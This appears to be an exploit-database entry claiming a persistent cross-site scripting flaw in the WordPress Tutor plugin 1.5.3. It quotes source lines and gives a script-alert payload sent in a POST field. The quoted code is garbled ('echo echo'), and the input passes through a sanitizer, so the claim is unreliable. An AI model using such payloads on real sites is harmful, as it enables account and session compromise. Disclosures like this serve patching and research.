Wordpress plugin tutor.1.5.3 persistent crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-02-13 | Type : webapps | Platform : php
This exploit / vulnerability Wordpress plugin tutor.1.5.3 persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/

===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id;
447: $topic_id = sanitize_text_field($_POST['topic_id']);
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================